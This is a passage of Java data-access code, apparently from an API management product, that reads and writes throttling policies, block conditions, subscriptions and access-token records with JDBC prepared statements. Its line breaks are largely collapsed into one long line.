            if (!StringUtils.isBlank(policy.getPolicyName()) && policy.getTenantId() != -1) {
                updateStatement = connection.prepareStatement(SQLConstants.UPDATE_GLOBAL_POLICY_SQL);
            } else if (!StringUtils.isBlank(policy.getUUID())) {
                updateStatement = connection.prepareStatement(SQLConstants.UPDATE_GLOBAL_POLICY_BY_UUID_SQL);
            } else {
                String errorMsg = "Policy object doesn't contain mandatory parameters. At least UUID or Name,Tenant Id"
                        + " should be provided. Name: " + policy.getPolicyName() + ", Tenant Id: "
                        + policy.getTenantId() + ", UUID: " + policy.getUUID();
                log.error(errorMsg);
                throw new APIManagementException(errorMsg);
            }
            updateStatement.setString(1, policy.getDescription());
            updateStatement.setBinaryStream(2, siddhiQueryInputStream, lengthOfBytes);
            updateStatement.setString(3, policy.getKeyTemplate());
            if (!StringUtils.isBlank(policy.getPolicyName()) && policy.getTenantId() != -1) {
                updateStatement.setString(4, policy.getPolicyName());
                updateStatement.setInt(5, policy.getTenantId());
            } else if (!StringUtils.isBlank(policy.getUUID())) {
                updateStatement.setString(4, policy.getUUID());
            }
            updateStatement.executeUpdate();
            connection.commit();
        } catch (SQLException e) {
            if (connection != null) {
                try {
                    connection.rollback();
                } catch (SQLException ex) {
                    // Rollback failed.
Exception will be thrown later for upper exception log.error("Failed to rollback the update Global Policy: " + policy.toString(), ex); } } handleException("Failed to update global policy: " + policy.getPolicyName() + '-' + policy.getTenantId(), e); } finally { APIMgtDBUtil.closeAllConnections(updateStatement, connection, null); } } /** * Retrieves list of available policy names under <code>policyLevel</code> * and user <code>username</code>'s tenant * * @param policyLevel policY level to filter policies * @param username username will be used to get the tenant * @return array of policy names * @throws APIManagementException */ public String[] getPolicyNames(String policyLevel, String username) throws APIManagementException { List<String> names = new ArrayList<String>(); Connection conn = null; PreparedStatement ps = null; ResultSet rs = null; String sqlQuery = null; int tenantID = APIUtil.getTenantId(username); try { conn = APIMgtDBUtil.getConnection(); if (PolicyConstants.POLICY_LEVEL_API.equals(policyLevel)) { sqlQuery = SQLConstants.ThrottleSQLConstants.GET_API_POLICY_NAMES; } else if (PolicyConstants.POLICY_LEVEL_APP.equals(policyLevel)) { sqlQuery = SQLConstants.GET_APP_POLICY_NAMES; } else if (PolicyConstants.POLICY_LEVEL_SUB.equals(policyLevel)) { sqlQuery = SQLConstants.GET_SUB_POLICY_NAMES; } else if (PolicyConstants.POLICY_LEVEL_GLOBAL.equals(policyLevel)) { sqlQuery = SQLConstants.GET_GLOBAL_POLICY_NAMES; } ps = conn.prepareStatement(sqlQuery); ps.setInt(1, tenantID); rs = ps.executeQuery(); while (rs.next()) { names.add(rs.getString(ThrottlePolicyConstants.COLUMN_NAME)); } } catch (SQLException e) { handleException("Error while executing SQL", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, rs); } return names.toArray(new String[names.size()]); } /** * Sets deployment status vaule of a policy in database. * * @param policyLevel policy level * @param policyName name of the policy * @param tenantId tenant id of the policy * @param isDeployed deployment status. <code>true</code> if deployment successful, <code>false</code> if not * @throws APIManagementException */ public void setPolicyDeploymentStatus(String policyLevel, String policyName, int tenantId, boolean isDeployed) throws APIManagementException { Connection connection = null; PreparedStatement statusStatement = null; String query = null; if (PolicyConstants.POLICY_LEVEL_APP.equals(policyLevel)) { query = SQLConstants.UPDATE_APPLICATION_POLICY_STATUS_SQL; } else if (PolicyConstants.POLICY_LEVEL_SUB.equals(policyLevel)) { query = SQLConstants.UPDATE_SUBSCRIPTION_POLICY_STATUS_SQL; } else if (PolicyConstants.POLICY_LEVEL_API.equals(policyLevel)) { query = SQLConstants.ThrottleSQLConstants.UPDATE_API_POLICY_STATUS_SQL; } else if (PolicyConstants.POLICY_LEVEL_GLOBAL.equals(policyLevel)) { query = SQLConstants.UPDATE_GLOBAL_POLICY_STATUS_SQL; } try { connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); statusStatement = connection.prepareStatement(query); statusStatement.setBoolean(1, isDeployed); statusStatement.setString(2, policyName); statusStatement.setInt(3, tenantId); statusStatement.executeUpdate(); connection.commit(); } catch (SQLException e) { if (connection != null) { try { connection.rollback(); } catch (SQLException ex) { // Rollback failed. 
Exception will be thrown later for upper exception log.error("Failed to rollback setting isDeployed flag: " + policyName + '-' + tenantId, ex); } } handleException("Failed to set deployment status to the policy: " + policyName + '-' + tenantId, e); } finally { APIMgtDBUtil.closeAllConnections(statusStatement, connection, null); } } /** * Populates common attribute data of the <code>policy</code> to <code>policyStatement</code> * * @param policyStatement prepared statement initialized of policy operation * @param policy <code>Policy</code> object with data * @throws SQLException */ private void setCommonParametersForPolicy(PreparedStatement policyStatement, Policy policy) throws SQLException { policyStatement.setString(1, policy.getPolicyName()); if (!StringUtils.isEmpty(policy.getDisplayName())) { policyStatement.setString(2, policy.getDisplayName()); } else { policyStatement.setString(2, policy.getPolicyName()); } policyStatement.setInt(3, policy.getTenantId()); policyStatement.setString(4, policy.getDescription()); policyStatement.setString(5, policy.getDefaultQuotaPolicy().getType()); //TODO use requestCount in same format in all places if (PolicyConstants.REQUEST_COUNT_TYPE.equalsIgnoreCase(policy.getDefaultQuotaPolicy().getType())) { RequestCountLimit limit = (RequestCountLimit) policy.getDefaultQuotaPolicy().getLimit(); policyStatement.setLong(6, limit.getRequestCount()); policyStatement.setString(7, null); } else if (PolicyConstants.BANDWIDTH_TYPE.equalsIgnoreCase(policy.getDefaultQuotaPolicy().getType())) { BandwidthLimit limit = (BandwidthLimit) policy.getDefaultQuotaPolicy().getLimit(); policyStatement.setLong(6, limit.getDataAmount()); policyStatement.setString(7, limit.getDataUnit()); } policyStatement.setLong(8, policy.getDefaultQuotaPolicy().getLimit().getUnitTime()); policyStatement.setString(9, policy.getDefaultQuotaPolicy().getLimit().getTimeUnit()); //policyStatement.setBoolean(9, APIUtil.isContentAwarePolicy(policy)); policyStatement.setBoolean(10, policy.isDeployed()); if (!StringUtils.isBlank(policy.getUUID())) { policyStatement.setString(11, policy.getUUID()); } else { policyStatement.setString(11, UUID.randomUUID().toString()); } } /** * Populated common attributes of policy type objects to <code>policy</code> * from <code>resultSet</code> * * @param policy initiallized {@link Policy} object to populate * @param resultSet {@link ResultSet} with data to populate <code>policy</code> * @throws SQLException */ private void setCommonPolicyDetails(Policy policy, ResultSet resultSet) throws SQLException { QuotaPolicy quotaPolicy = new QuotaPolicy(); String prefix = ""; if (policy instanceof APIPolicy) { prefix = "DEFAULT_"; } quotaPolicy.setType(resultSet.getString(prefix + ThrottlePolicyConstants.COLUMN_QUOTA_POLICY_TYPE)); if (resultSet.getString(prefix + ThrottlePolicyConstants.COLUMN_QUOTA_POLICY_TYPE) .equalsIgnoreCase(PolicyConstants.REQUEST_COUNT_TYPE)) { RequestCountLimit reqLimit = new RequestCountLimit(); reqLimit.setUnitTime(resultSet.getInt(prefix + ThrottlePolicyConstants.COLUMN_UNIT_TIME)); reqLimit.setTimeUnit(resultSet.getString(prefix + ThrottlePolicyConstants.COLUMN_TIME_UNIT)); reqLimit.setRequestCount(resultSet.getInt(prefix + ThrottlePolicyConstants.COLUMN_QUOTA)); quotaPolicy.setLimit(reqLimit); } else if (resultSet.getString(prefix + ThrottlePolicyConstants.COLUMN_QUOTA_POLICY_TYPE) .equalsIgnoreCase(PolicyConstants.BANDWIDTH_TYPE)) { BandwidthLimit bandLimit = new BandwidthLimit(); bandLimit.setUnitTime(resultSet.getInt(prefix + 
ThrottlePolicyConstants.COLUMN_UNIT_TIME)); bandLimit.setTimeUnit(resultSet.getString(prefix + ThrottlePolicyConstants.COLUMN_TIME_UNIT)); bandLimit.setDataAmount(resultSet.getInt(prefix + ThrottlePolicyConstants.COLUMN_QUOTA)); bandLimit.setDataUnit(resultSet.getString(prefix + ThrottlePolicyConstants.COLUMN_QUOTA_UNIT)); quotaPolicy.setLimit(bandLimit); } policy.setUUID(resultSet.getString(ThrottlePolicyConstants.COLUMN_UUID)); policy.setDescription(resultSet.getString(ThrottlePolicyConstants.COLUMN_DESCRIPTION)); policy.setDisplayName(resultSet.getString(ThrottlePolicyConstants.COLUMN_DISPLAY_NAME)); policy.setPolicyId(resultSet.getInt(ThrottlePolicyConstants.COLUMN_POLICY_ID)); policy.setTenantId(resultSet.getInt(ThrottlePolicyConstants.COLUMN_TENANT_ID)); policy.setTenantDomain(IdentityTenantUtil.getTenantDomain(policy.getTenantId())); policy.setDefaultQuotaPolicy(quotaPolicy); policy.setDeployed(resultSet.getBoolean(ThrottlePolicyConstants.COLUMN_DEPLOYED)); } public boolean isPolicyExist(String policyType, int tenantId, String policyName) throws APIManagementException { Connection connection = null; PreparedStatement isExistStatement = null; boolean isExist = false; String policyTable = null; if (PolicyConstants.POLICY_LEVEL_API.equalsIgnoreCase(policyType)) { policyTable = PolicyConstants.API_THROTTLE_POLICY_TABLE; } else if (PolicyConstants.POLICY_LEVEL_APP.equalsIgnoreCase(policyType)) { policyTable = PolicyConstants.POLICY_APPLICATION_TABLE; } else if (PolicyConstants.POLICY_LEVEL_GLOBAL.equalsIgnoreCase(policyType)) { policyTable = PolicyConstants.POLICY_GLOBAL_TABLE; } else if (PolicyConstants.POLICY_LEVEL_SUB.equalsIgnoreCase(policyType)) { policyTable = PolicyConstants.POLICY_SUBSCRIPTION_TABLE; } try { String query = "SELECT " + PolicyConstants.POLICY_ID + " FROM " + policyTable + " WHERE TENANT_ID =? AND NAME = ? "; connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(true); isExistStatement = connection.prepareStatement(query); isExistStatement.setInt(1, tenantId); isExistStatement.setString(2, policyName); ResultSet result = isExistStatement.executeQuery(); if (result != null && result.next()) { isExist = true; } } catch (SQLException e) { handleException("Failed to check is exist: " + policyName + '-' + tenantId, e); } finally { APIMgtDBUtil.closeAllConnections(isExistStatement, connection, null); } return isExist; } public boolean isPolicyDeployed(String policyType, int tenantId, String policyName) throws APIManagementException { Connection connection = null; PreparedStatement isExistStatement = null; boolean isDeployed = false; String policyTable = null; if (PolicyConstants.POLICY_LEVEL_API.equalsIgnoreCase(policyType)) { policyTable = PolicyConstants.API_THROTTLE_POLICY_TABLE; } else if (PolicyConstants.POLICY_LEVEL_APP.equalsIgnoreCase(policyType)) { policyTable = PolicyConstants.POLICY_APPLICATION_TABLE; } else if (PolicyConstants.POLICY_LEVEL_GLOBAL.equalsIgnoreCase(policyType)) { policyTable = PolicyConstants.POLICY_GLOBAL_TABLE; } else if (PolicyConstants.POLICY_LEVEL_SUB.equalsIgnoreCase(policyType)) { policyTable = PolicyConstants.POLICY_SUBSCRIPTION_TABLE; } try { String query = "SELECT " + PolicyConstants.POLICY_IS_DEPLOYED + " FROM " + policyTable + " WHERE TENANT_ID =? AND NAME = ? 
"; connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(true); isExistStatement = connection.prepareStatement(query); isExistStatement.setInt(1, tenantId); isExistStatement.setString(2, policyName); ResultSet result = isExistStatement.executeQuery(); if (result != null && result.next()) { isDeployed = result.getBoolean(PolicyConstants.POLICY_IS_DEPLOYED); } } catch (SQLException e) { handleException("Failed to check is exist: " + policyName + '-' + tenantId, e); } finally { APIMgtDBUtil.closeAllConnections(isExistStatement, connection, null); } return isDeployed; } /** * Add a block condition * * @param conditionType Type of the block condition * @param conditionValue value related to the type * @param tenantDomain tenant domain the block condition should be effective * @return uuid of the block condition if successfully added * @throws APIManagementException */ public String addBlockConditions(String conditionType, String conditionValue, String tenantDomain) throws APIManagementException { Connection connection = null; PreparedStatement insertPreparedStatement = null; boolean status = false; boolean valid = false; ResultSet rs = null; String uuid = null; try { String query = SQLConstants.ThrottleSQLConstants.ADD_BLOCK_CONDITIONS_SQL; if (APIConstants.BLOCKING_CONDITIONS_API.equals(conditionType)) { String extractedTenantDomain = MultitenantUtils.getTenantDomainFromRequestURL(conditionValue); if (extractedTenantDomain == null) { extractedTenantDomain = MultitenantConstants.SUPER_TENANT_DOMAIN_NAME; } if (tenantDomain.equals(extractedTenantDomain) && isValidContext(conditionValue)) { valid = true; } else { throw new APIManagementException("Couldn't Save Block Condition Due to Invalid API Context " + conditionValue); } } else if (APIConstants.BLOCKING_CONDITIONS_APPLICATION.equals(conditionType)) { String appArray[] = conditionValue.split(":"); if (appArray.length > 1) { String appOwner = appArray[0]; String appName = appArray[1]; if ((MultitenantUtils.getTenantDomain(appOwner).equals(tenantDomain)) && isValidApplication(appOwner, appName)) { valid = true; } else { throw new APIManagementException("Couldn't Save Block Condition Due to Invalid Application " + "name " + appName + " from Application " + "Owner " + appOwner); } } } else if (APIConstants.BLOCKING_CONDITIONS_USER.equals(conditionType)) { if (MultitenantUtils.getTenantDomain(conditionValue).equals(tenantDomain)) { valid = true; } else { throw new APIManagementException("Invalid User in Tenant Domain " + tenantDomain); } } else if (APIConstants.BLOCKING_CONDITIONS_IP.equals(conditionType)) { valid = true; } if (valid) { connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); if (!isBlockConditionExist(conditionType, conditionValue, tenantDomain, connection)) { uuid = UUID.randomUUID().toString(); insertPreparedStatement = connection.prepareStatement(query); insertPreparedStatement.setString(1, conditionType); insertPreparedStatement.setString(2, conditionValue); insertPreparedStatement.setString(3, "TRUE"); insertPreparedStatement.setString(4, tenantDomain); insertPreparedStatement.setString(5, uuid); status = insertPreparedStatement.execute(); connection.commit(); status = true; } else { throw new BlockConditionAlreadyExistsException( "Condition with type: " + conditionType + ", value: " + conditionValue + " already exists"); } } } catch (SQLException e) { if (connection != null) { try { connection.rollback(); } catch (SQLException ex) { handleException( "Failed to rollback adding Block condition 
: " + conditionType + " and " + conditionValue, ex); } } handleException("Failed to add Block condition : " + conditionType + " and " + conditionValue, e); } finally { APIMgtDBUtil.closeAllConnections(insertPreparedStatement, connection, null); } if (status) { return uuid; } else { return null; } } /** * Get details of a block condition by Id * * @param conditionId id of the condition * @return Block conditoin represented by the UUID * @throws APIManagementException */ public BlockConditionsDTO getBlockCondition(int conditionId) throws APIManagementException { Connection connection = null; PreparedStatement selectPreparedStatement = null; ResultSet resultSet = null; BlockConditionsDTO blockCondition = null; try { String query = SQLConstants.ThrottleSQLConstants.GET_BLOCK_CONDITION_SQL; connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(true); selectPreparedStatement = connection.prepareStatement(query); selectPreparedStatement.setInt(1, conditionId); resultSet = selectPreparedStatement.executeQuery(); if (resultSet.next()) { blockCondition = new BlockConditionsDTO(); blockCondition.setEnabled(resultSet.getBoolean("ENABLED")); blockCondition.setConditionType(resultSet.getString("TYPE")); blockCondition.setConditionValue(resultSet.getString("VALUE")); blockCondition.setConditionId(conditionId); blockCondition.setTenantDomain(resultSet.getString("DOMAIN")); blockCondition.setUUID(resultSet.getString("UUID")); } } catch (SQLException e) { if (connection != null) { try { connection.rollback(); } catch (SQLException ex) { handleException("Failed to rollback getting Block condition with id " + conditionId, ex); } } handleException("Failed to get Block condition with id " + conditionId, e); } finally { APIMgtDBUtil.closeAllConnections(selectPreparedStatement, connection, resultSet); } return blockCondition; } /** * Get details of a block condition by UUID * * @param uuid uuid of the block condition * @return Block conditoin represented by the UUID * @throws APIManagementException */ public BlockConditionsDTO getBlockConditionByUUID(String uuid) throws APIManagementException { Connection connection = null; PreparedStatement selectPreparedStatement = null; ResultSet resultSet = null; BlockConditionsDTO blockCondition = null; try { String query = SQLConstants.ThrottleSQLConstants.GET_BLOCK_CONDITION_BY_UUID_SQL; connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(true); selectPreparedStatement = connection.prepareStatement(query); selectPreparedStatement.setString(1, uuid); resultSet = selectPreparedStatement.executeQuery(); if (resultSet.next()) { blockCondition = new BlockConditionsDTO(); blockCondition.setEnabled(resultSet.getBoolean("ENABLED")); blockCondition.setConditionType(resultSet.getString("TYPE")); blockCondition.setConditionValue(resultSet.getString("VALUE")); blockCondition.setConditionId(resultSet.getInt("CONDITION_ID")); blockCondition.setTenantDomain(resultSet.getString("DOMAIN")); blockCondition.setUUID(resultSet.getString("UUID")); } } catch (SQLException e) { if (connection != null) { try { connection.rollback(); } catch (SQLException ex) { handleException("Failed to rollback getting Block condition by uuid " + uuid, ex); } } handleException("Failed to get Block condition by uuid " + uuid, e); } finally { APIMgtDBUtil.closeAllConnections(selectPreparedStatement, connection, resultSet); } return blockCondition; } public List<BlockConditionsDTO> getBlockConditions(String tenantDomain) throws APIManagementException { Connection connection = null; 
PreparedStatement selectPreparedStatement = null; ResultSet resultSet = null; List<BlockConditionsDTO> blockConditionsDTOList = new ArrayList<BlockConditionsDTO>(); try { String query = SQLConstants.ThrottleSQLConstants.GET_BLOCK_CONDITIONS_SQL; connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(true); selectPreparedStatement = connection.prepareStatement(query); selectPreparedStatement.setString(1, tenantDomain); resultSet = selectPreparedStatement.executeQuery(); while (resultSet.next()) { BlockConditionsDTO blockConditionsDTO = new BlockConditionsDTO(); blockConditionsDTO.setEnabled(resultSet.getBoolean("ENABLED")); blockConditionsDTO.setConditionType(resultSet.getString("TYPE")); blockConditionsDTO.setConditionValue(resultSet.getString("VALUE")); blockConditionsDTO.setConditionId(resultSet.getInt("CONDITION_ID")); blockConditionsDTO.setUUID(resultSet.getString("UUID")); blockConditionsDTO.setTenantDomain(resultSet.getString("DOMAIN")); blockConditionsDTOList.add(blockConditionsDTO); } } catch (SQLException e) { if (connection != null) { try { connection.rollback(); } catch (SQLException ex) { handleException("Failed to rollback getting Block conditions ", ex); } } handleException("Failed to get Block conditions", e); } finally { APIMgtDBUtil.closeAllConnections(selectPreparedStatement, connection, resultSet); } return blockConditionsDTOList; } /** * Update the block condition state true (Enabled) /false (Disabled) given the UUID * * @param conditionId id of the block condition * @param state blocking state * @return true if the operation was success * @throws APIManagementException */ public boolean updateBlockConditionState(int conditionId, String state) throws APIManagementException { Connection connection = null; PreparedStatement updateBlockConditionPreparedStatement = null; boolean status = false; try { String query = SQLConstants.ThrottleSQLConstants.UPDATE_BLOCK_CONDITION_STATE_SQL; connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); updateBlockConditionPreparedStatement = connection.prepareStatement(query); updateBlockConditionPreparedStatement.setString(1, state.toUpperCase()); updateBlockConditionPreparedStatement.setInt(2, conditionId); updateBlockConditionPreparedStatement.executeUpdate(); connection.commit(); status = true; } catch (SQLException e) { if (connection != null) { try { connection.rollback(); } catch (SQLException ex) { handleException("Failed to rollback updating Block condition with condition id " + conditionId, ex); } } handleException("Failed to update Block condition with condition id " + conditionId, e); } finally { APIMgtDBUtil.closeAllConnections(updateBlockConditionPreparedStatement, connection, null); } return status; } /** * Update the block condition state true (Enabled) /false (Disabled) given the UUID * * @param uuid UUID of the block condition * @param state blocking state * @return true if the operation was success * @throws APIManagementException */ public boolean updateBlockConditionStateByUUID(String uuid, String state) throws APIManagementException { Connection connection = null; PreparedStatement updateBlockConditionPreparedStatement = null; boolean status = false; try { String query = SQLConstants.ThrottleSQLConstants.UPDATE_BLOCK_CONDITION_STATE_BY_UUID_SQL; connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); updateBlockConditionPreparedStatement = connection.prepareStatement(query); updateBlockConditionPreparedStatement.setString(1, state.toUpperCase()); 
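            // The blocking state is stored in upper case; it is bound together with the UUID identifying the condition row.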
updateBlockConditionPreparedStatement.setString(2, uuid); updateBlockConditionPreparedStatement.executeUpdate(); connection.commit(); status = true; } catch (SQLException e) { if (connection != null) { try { connection.rollback(); } catch (SQLException ex) { handleException("Failed to rollback updating Block condition with condition UUID " + uuid, ex); } } handleException("Failed to update Block condition with condition UUID " + uuid, e); } finally { APIMgtDBUtil.closeAllConnections(updateBlockConditionPreparedStatement, connection, null); } return status; } /** * Delete the block condition given the id * * @param conditionId id of the condition * @return true if successfully deleted * @throws APIManagementException */ public boolean deleteBlockCondition(int conditionId) throws APIManagementException { Connection connection = null; PreparedStatement deleteBlockConditionPreparedStatement = null; boolean status = false; try { String query = SQLConstants.ThrottleSQLConstants.DELETE_BLOCK_CONDITION_SQL; connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); deleteBlockConditionPreparedStatement = connection.prepareStatement(query); deleteBlockConditionPreparedStatement.setInt(1, conditionId); status = deleteBlockConditionPreparedStatement.execute(); connection.commit(); status = true; } catch (SQLException e) { if (connection != null) { try { connection.rollback(); } catch (SQLException ex) { handleException("Failed to rollback deleting Block condition with condition id " + conditionId, ex); } } handleException("Failed to delete Block condition with condition id " + conditionId, e); } finally { APIMgtDBUtil.closeAllConnections(deleteBlockConditionPreparedStatement, connection, null); } return status; } /** * Delete the block condition given the id * * @param uuid UUID of the block condition * @return true if successfully deleted * @throws APIManagementException */ public boolean deleteBlockConditionByUUID(String uuid) throws APIManagementException { Connection connection = null; PreparedStatement deleteBlockConditionPreparedStatement = null; boolean status = false; try { String query = SQLConstants.ThrottleSQLConstants.DELETE_BLOCK_CONDITION_BY_UUID_SQL; connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); deleteBlockConditionPreparedStatement = connection.prepareStatement(query); deleteBlockConditionPreparedStatement.setString(1, uuid); status = deleteBlockConditionPreparedStatement.execute(); connection.commit(); status = true; } catch (SQLException e) { if (connection != null) { try { connection.rollback(); } catch (SQLException ex) { handleException("Failed to rollback deleting Block condition with condition UUID " + uuid, ex); } } handleException("Failed to delete Block condition with condition UUID " + uuid, e); } finally { APIMgtDBUtil.closeAllConnections(deleteBlockConditionPreparedStatement, connection, null); } return status; } private boolean isValidContext(String context) throws APIManagementException { Connection connection = null; PreparedStatement validateContextPreparedStatement = null; ResultSet resultSet = null; boolean status = false; try { String query = "select count(*) COUNT from AM_API where CONTEXT=?"; connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); validateContextPreparedStatement = connection.prepareStatement(query); validateContextPreparedStatement.setString(1, context); resultSet = validateContextPreparedStatement.executeQuery(); connection.commit(); if (resultSet.next() && 
resultSet.getInt("COUNT") > 0) { status = true; } } catch (SQLException e) { if (connection != null) { try { connection.rollback(); } catch (SQLException ex) { handleException("Failed to rollback checking Block condition with context " + context, ex); } } handleException("Failed to check Block condition with context " + context, e); } finally { APIMgtDBUtil.closeAllConnections(validateContextPreparedStatement, connection, resultSet); } return status; } private boolean isValidApplication(String appOwner, String appName) throws APIManagementException { Connection connection = null; PreparedStatement validateContextPreparedStatement = null; ResultSet resultSet = null; boolean status = false; try { String query = "SELECT * FROM AM_APPLICATION App,AM_SUBSCRIBER SUB WHERE App.NAME=? AND App" + ".SUBSCRIBER_ID=SUB.SUBSCRIBER_ID AND SUB.USER_ID=?"; connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); validateContextPreparedStatement = connection.prepareStatement(query); validateContextPreparedStatement.setString(1, appName); validateContextPreparedStatement.setString(2, appOwner); resultSet = validateContextPreparedStatement.executeQuery(); connection.commit(); if (resultSet.next()) { status = true; } } catch (SQLException e) { if (connection != null) { try { connection.rollback(); } catch (SQLException ex) { handleException( "Failed to rollback checking Block condition with Application Name " + appName + " with " + "Application Owner" + appOwner, ex); } } handleException("Failed to check Block condition with Application Name " + appName + " with " + "Application Owner" + appOwner, e); } finally { APIMgtDBUtil.closeAllConnections(validateContextPreparedStatement, connection, resultSet); } return status; } public String getAPILevelTier(int id) throws APIManagementException { Connection connection = null; PreparedStatement selectPreparedStatement = null; ResultSet resultSet = null; String apiLevelTier = null; try { String query = SQLConstants.GET_API_DETAILS_SQL; connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(true); selectPreparedStatement = connection.prepareStatement(query + " WHERE API_ID = ?"); selectPreparedStatement.setInt(1, id); resultSet = selectPreparedStatement.executeQuery(); while (resultSet.next()) { apiLevelTier = resultSet.getString("API_TIER"); } } catch (SQLException e) { if (connection != null) { try { connection.rollback(); } catch (SQLException ex) { handleException("Failed to rollback getting API Details", ex); } } handleException("Failed to get API Details", e); } finally { APIMgtDBUtil.closeAllConnections(selectPreparedStatement, connection, resultSet); } return apiLevelTier; } private boolean isBlockConditionExist(String conditionType, String conditionValue, String tenantDomain, Connection connection) throws APIManagementException { PreparedStatement checkIsExistPreparedStatement = null; ResultSet checkIsResultSet = null; boolean status = false; try { String isExistQuery = SQLConstants.ThrottleSQLConstants.BLOCK_CONDITION_EXIST_SQL; checkIsExistPreparedStatement = connection.prepareStatement(isExistQuery); checkIsExistPreparedStatement.setString(1, tenantDomain); checkIsExistPreparedStatement.setString(2, conditionType); checkIsExistPreparedStatement.setString(3, conditionValue); checkIsResultSet = checkIsExistPreparedStatement.executeQuery(); connection.commit(); if (checkIsResultSet.next()) { status = true; } } catch (SQLException e) { String msg = "Couldn't check the Block Condition Exist"; log.error(msg, e); 
handleException(msg, e); } finally { APIMgtDBUtil.closeAllConnections(checkIsExistPreparedStatement, null, checkIsResultSet); } return status; } public boolean hasSubscription(String tierId, String tenantDomainWithAt, String policyLevel) throws APIManagementException { PreparedStatement checkIsExistPreparedStatement = null; Connection connection = null; ResultSet checkIsResultSet = null; boolean status = false; try { /*String apiProvider = tenantId;*/ connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(true); String isExistQuery = SQLConstants.ThrottleSQLConstants.TIER_HAS_SUBSCRIPTION; if (PolicyConstants.POLICY_LEVEL_API.equals(policyLevel)) { isExistQuery = SQLConstants.ThrottleSQLConstants.TIER_ATTACHED_TO_RESOURCES_API; } else if (PolicyConstants.POLICY_LEVEL_APP.equals(policyLevel)) { isExistQuery = SQLConstants.ThrottleSQLConstants.TIER_ATTACHED_TO_APPLICATION; } else if (PolicyConstants.POLICY_LEVEL_SUB.equals(policyLevel)) { isExistQuery = SQLConstants.ThrottleSQLConstants.TIER_HAS_SUBSCRIPTION; } checkIsExistPreparedStatement = connection.prepareStatement(isExistQuery); checkIsExistPreparedStatement.setString(1, tierId); checkIsExistPreparedStatement.setString(2, "%" + tenantDomainWithAt); if (PolicyConstants.POLICY_LEVEL_API.equals(policyLevel)) { checkIsExistPreparedStatement.setString(3, tierId); checkIsExistPreparedStatement.setString(4, "%" + tenantDomainWithAt); } checkIsResultSet = checkIsExistPreparedStatement.executeQuery(); if (checkIsResultSet != null && checkIsResultSet.next()) { int count = checkIsResultSet.getInt(1); if (count > 0) { status = true; } } connection.setAutoCommit(true); } catch (SQLException e) { String msg = "Couldn't check Subscription Exist"; log.error(msg, e); handleException(msg, e); } finally { APIMgtDBUtil.closeAllConnections(checkIsExistPreparedStatement, connection, checkIsResultSet); } return status; } /** * Get a list of access tokens issued for given user under the given app of given owner. 
Returned object carries * consumer key and secret information related to the access token * * @param userName end user name * @param appName application name * @param appOwner application owner user name * @return list of tokens * @throws SQLException in case of a DB issue */ public static List<AccessTokenInfo> getAccessTokenListForUser(String userName, String appName, String appOwner) throws SQLException { List<AccessTokenInfo> accessTokens = new ArrayList<AccessTokenInfo>(5); Connection connection = APIMgtDBUtil.getConnection(); PreparedStatement consumerSecretIDPS = connection.prepareStatement(SQLConstants.GET_ACCESS_TOKENS_BY_USER_SQL); consumerSecretIDPS.setString(1, userName); consumerSecretIDPS.setString(2, appName); consumerSecretIDPS.setString(3, appOwner); ResultSet consumerSecretIDResult = consumerSecretIDPS.executeQuery(); while (consumerSecretIDResult.next()) { String consumerKey = consumerSecretIDResult.getString(1); String consumerSecret = consumerSecretIDResult.getString(2); String accessToken = consumerSecretIDResult.getString(3); AccessTokenInfo accessTokenInfo = new AccessTokenInfo(); accessTokenInfo.setConsumerKey(consumerKey); accessTokenInfo.setConsumerSecret(consumerSecret); accessTokenInfo.setAccessToken(accessToken); accessTokens.add(accessTokenInfo); } return accessTokens; } public String[] getAPIDetailsByContext(String context) { String apiName = ""; String apiProvider = ""; String sql = SQLConstants.GET_API_FOR_CONTEXT_TEMPLATE_SQL; Connection conn = null; PreparedStatement ps = null; ResultSet rs = null; try { conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(true); ps = conn.prepareStatement(sql); ps.setString(1, context); rs = ps.executeQuery(); if (rs.next()) { apiName = rs.getString("API_NAME"); apiProvider = rs.getString("API_PROVIDER"); } } catch (SQLException e) { log.error("Error occurred while fetching data: " + e.getMessage(), e); } finally { try { conn.setAutoCommit(false); } catch (SQLException e) { log.error("Error occurred while fetching data: " + e.getMessage(), e); } APIMgtDBUtil.closeAllConnections(ps, conn, rs); } return new String[]{apiName, apiProvider}; } /** * Check for the subscription of the user * * @param infoDTO * @param context * @param version * @param consumerKey * @return APIKeyValidationInfoDTO including data of api and application * @throws APIManagementException */ public APIKeyValidationInfoDTO validateSubscriptionDetails(APIKeyValidationInfoDTO infoDTO, String context, String version, String consumerKey, boolean defaultVersionInvoked) throws APIManagementException { String apiTenantDomain = MultitenantUtils.getTenantDomainFromRequestURL(context); if (apiTenantDomain == null) { apiTenantDomain = MultitenantConstants.SUPER_TENANT_DOMAIN_NAME; } int apiOwnerTenantId = APIUtil.getTenantIdFromTenantDomain(apiTenantDomain); String sql; boolean isAdvancedThrottleEnabled = APIUtil.isAdvanceThrottlingEnabled(); if (!isAdvancedThrottleEnabled) { if (defaultVersionInvoked) { sql = SQLConstants.VALIDATE_SUBSCRIPTION_KEY_DEFAULT_SQL; } else { sql = SQLConstants.VALIDATE_SUBSCRIPTION_KEY_VERSION_SQL; } } else { if (defaultVersionInvoked) { sql = SQLConstants.ADVANCED_VALIDATE_SUBSCRIPTION_KEY_DEFAULT_SQL; } else { sql = SQLConstants.ADVANCED_VALIDATE_SUBSCRIPTION_KEY_VERSION_SQL; } } Connection conn = null; PreparedStatement ps = null; ResultSet rs = null; try { conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(true); ps = conn.prepareStatement(sql); ps.setString(1, context); ps.setString(2, consumerKey); if 
